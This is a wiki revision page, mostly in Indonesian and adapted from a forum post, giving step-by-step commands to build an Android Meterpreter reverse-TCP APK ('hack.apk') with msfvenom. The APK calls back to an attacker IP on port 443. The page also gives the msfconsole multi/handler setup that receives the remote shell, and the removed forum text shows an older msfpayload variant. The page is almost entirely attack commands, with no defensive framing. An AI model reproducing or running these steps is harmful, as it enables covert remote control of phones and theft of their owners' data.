Difference between revisions of "MSF: Android/Meterpreter/reverse tcp APK dengan msfvenom"

From OnnoWiki
Jump to navigation Jump to search
(Created page with "sumber: https://null-byte.wonderhowto.com/forum/create-and-use-android-meterpreter-reverse-tcp-apk-with-msfvenom-0162921/ Hi, Metasploit was updated recently (or, at least, s...")
 
 
Line 1: Line 1:
 
sumber: https://null-byte.wonderhowto.com/forum/create-and-use-android-meterpreter-reverse-tcp-apk-with-msfvenom-0162921/
 
sumber: https://null-byte.wonderhowto.com/forum/create-and-use-android-meterpreter-reverse-tcp-apk-with-msfvenom-0162921/
  
Hi, Metasploit was updated recently (or, at least, since the last time I used it), and one large thing, is msfpayload was removed, and replaced with msfvenom. I used to be able to just do msfpayload android/meterpreter/reverse_tcp LHOST=ip R > /root/name.apk
+
Membuat apk dengan msfvenom
  
Which would create the APK, and then
+
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.209 LPORT=443 > hack.apk
msfconsole
 
use exploit/multi/handler
 
set payload android/meterpreter/reverse_tcp
 
set LHOST ip
 
exploit
 
To start listening, and it always worked, once the APK was executed on the android device (always my device, btw)
 
  
Now, I've tried substituting msfvenom -p for msfpayload, and it creates the APK, but when it is run and the listener is started, it does not connect.
+
Asumsi
  
Does anyone know what I'm doing wrong? I can't seem to figure out this new method of things...
+
IP attacker (kali linux) 192.168.0.209
Thanks!
+
port attacker 443
Related
 
58 Responses
 
1
 
Cracker|Hacker
 
Cracker|Hacker
 
1 year ago - edited 1 year ago
 
  
Can you give us screenshots and the full command, please?
+
Di sisi attacker / kali linux
 +
 
 +
msfconsole
 +
 
 +
use exploit/multi/handler
 +
set payload android/meterpreter/reverse_tcp
 +
set lhost 192.168.0.209
 +
set lport 443
 +
exploit
  
  

Latest revision as of 05:50, 1 June 2017

sumber: https://null-byte.wonderhowto.com/forum/create-and-use-android-meterpreter-reverse-tcp-apk-with-msfvenom-0162921/

Membuat apk dengan msfvenom

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.209 LPORT=443 > hack.apk

Asumsi

IP attacker (kali linux) 192.168.0.209
port attacker 443

Di sisi attacker / kali linux

msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.0.209
set lport 443
exploit


Referensi